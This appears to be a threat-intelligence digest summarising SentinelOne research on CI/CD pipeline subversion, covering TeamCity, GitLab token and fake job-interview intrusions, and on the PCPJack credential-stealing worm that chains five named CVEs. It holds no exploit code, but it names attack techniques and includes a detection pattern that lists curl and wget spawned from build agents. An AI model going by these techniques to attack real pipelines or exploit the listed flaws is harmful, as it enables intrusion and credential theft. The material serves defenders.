SentinelOne — Living Off the Pipeline CI/CD subversion taxonomy with three case studies (TeamCity / GitLab service-account / Contagious Interview)

SentinelOne published on 2026-05-15 a practitioner-focused taxonomy of CI/CD pipeline subversion techniques, illustrated with three real intrusion case studies that are immediately useful for SOC and DevSecOps teams running JetBrains TeamCity, GitLab, or GitHub Actions (SentinelOne, 2026-05-15). Case 1: an unpatched TeamCity server (CVE-2023-42793) exploited to deploy backdoors via privileged build tasks, remaining undetected for 12+ months. Case 2: a GitLab service-account token compromise enabling creation of malicious Ansible playbooks that were then automatically executed by pipelines — a clean demonstration of how service-account over-privilege translates directly into production code execution. Case 3: the Contagious Interview campaign using fraudulent job offers directing developer victims to fake skill-assessment sites that deploy malware silently to developer workstations. Additional vectors covered include attacker-registered self-hosted runners, workflow triggers from repository discussion comments, dependency poisoning with reconnaissance preinstall scripts, and maintainer-account compromise appending malicious code; the article cross-links a separate SentinelOne analysis of the "Sha1-Hulud" NPM compromise as a related supply-chain case. MITRE ATT&CK: T1195.002, T1547 (rogue runner registration as persistence), T1555 (pipeline secret extraction), T1204 (user execution via fake job-offer social engineering), T1072 (software-deployment-tool abuse via Ansible). Defender monitoring priorities surfaced in the report: GitHub / GitLab audit logs for runner.registered events with unfamiliar names or unexpected source IP ranges; new or modified pipelines authored by service accounts; suspicious child-process spawn from build agents (cmd.exe, powershell.exe, curl, wget outside baseline); credential-access and reverse-tunnel traffic originating from build infrastructure; and secret-injection patterns in workflow-config modifications. Single-source — SentinelOne only.

Current state: SentinelLabs documented PCPJack on 2026-05-07 as a worm-class framework that evicts and deletes existing TeamPCP artefacts on compromise (giving the framework its name), then deploys six Python modules harvesting credentials from Docker, Kubernetes, Redis, MongoDB, RayML, and dozens of cloud / SaaS services (AWS, Azure, GCP, GitHub, Slack, HashiCorp Vault, 1Password). Propagation targets are pulled from Common Crawl Parquet files rather than ad-hoc scanning — far broader curated attack surface than typical opportunistic worms. Weaponises five public CVEs simultaneously (CVE-2025-29927 Next.js, CVE-2025-55182 React2Shell, CVE-2026-1357 WPVivid, CVE-2025-9501 W3 Total Cache, CVE-2025-48703 CWP). The TeamPCP → PCPJack succession overlay is the operational specific worth tracking: SentinelLabs explicitly states there is no evidence yet of a direct operator-level connection, while the eviction logic implies operators familiar with TeamPCP's target population. Defenders running self-hosted Next.js, React-server-actions stacks, WordPress with WPVivid Backup or W3 Total Cache, or CentOS Web Panel with internet-reachable FileManager should treat all five CVEs as actively weaponised (SentinelLabs, 2026-05-07 · The Hacker News, 2026-05-07 · SecurityWeek, 2026-05-08 · daily 2026-05-10). The earlier TeamPCP "Mini Shai-Hulud" SAP CAP npm worm (covered 2026-05-06) used Claude Code SessionStart hooks and VSCode tasks for propagation — that thread is separate from PCPJack's CVE-chain propagation but the same operator population is tracked.

SentinelLabs documented PCPJack on 2026-05-07, a worm-class framework that propagates across exposed cloud and web infrastructure by chaining five public CVEs simultaneously: CVE-2025-29927 (Next.js middleware authorisation bypass via crafted header), CVE-2025-55182 ("React2Shell" — Server Actions deserialisation in React/Next.js), CVE-2026-1357 (unauthenticated file upload in WPVivid Backup), CVE-2025-9501 (PHP injection in W3 Total Cache via the mfunc comment processor) and CVE-2025-48703 (shell injection in the CentOS Web Panel FileManager) (SentinelLabs, 2026-05-07 · The Hacker News, 2026-05-07 · SecurityWeek, 2026-05-08). The bootstrap shell script first evicts and deletes existing TeamPCP artefacts from the host (giving the framework its name), then deploys six Python modules covering credential extraction from Docker, Kubernetes, Redis, MongoDB, RayML, and dozens of cloud / SaaS services (AWS, Azure, GCP, GitHub, Slack, HashiCorp Vault, 1Password). A second-stage tooling drops Sliver C2 beacons.

Exfiltration uses Telegram channels with ChaCha20-Poly1305 encryption; propagation target lists are pulled from Common Crawl Parquet files rather than scanned ad-hoc, which gives the campaign a far broader and more curated attack surface than typical opportunistic scanning. Unlike TeamPCP and TeamTNT which monetise via cryptominers, PCPJack drops no miner — SentinelLabs assesses monetisation as credential fraud, spam, access resale, or extortion (SentinelLabs, 2026-05-07). SentinelLabs notes TTP overlap with TeamPCP and frames PCPJack as a possible former affiliate or breakaway operation. Defenders running self-hosted Next.js, React-server-actions stacks, WordPress with WPVivid Backup or W3 Total Cache, or CentOS Web Panel with internet-reachable FileManager should treat all five CVEs as actively weaponised.